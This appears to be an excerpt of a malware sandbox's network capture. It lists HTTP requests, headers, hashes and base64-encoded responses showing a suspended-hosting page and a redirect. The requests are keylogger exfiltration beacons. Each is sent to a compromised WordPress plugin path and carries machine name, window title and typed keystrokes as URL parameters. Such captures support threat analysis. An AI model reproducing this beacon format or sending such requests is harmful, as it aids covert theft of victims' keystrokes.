eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 22:55:10 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
42 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20PM text/html post.php 302 Found HTML 345.0 B 01/22/67 06:37:44
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT04OjU0JTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
50d5a4abd69275e8d3d2a4f3aba04f8c5296b477d0a5b7e2e05487c047096d33
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Sat, 03 Dec 2016 04:54:43 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
43 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 01/22/67 07:30:05
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
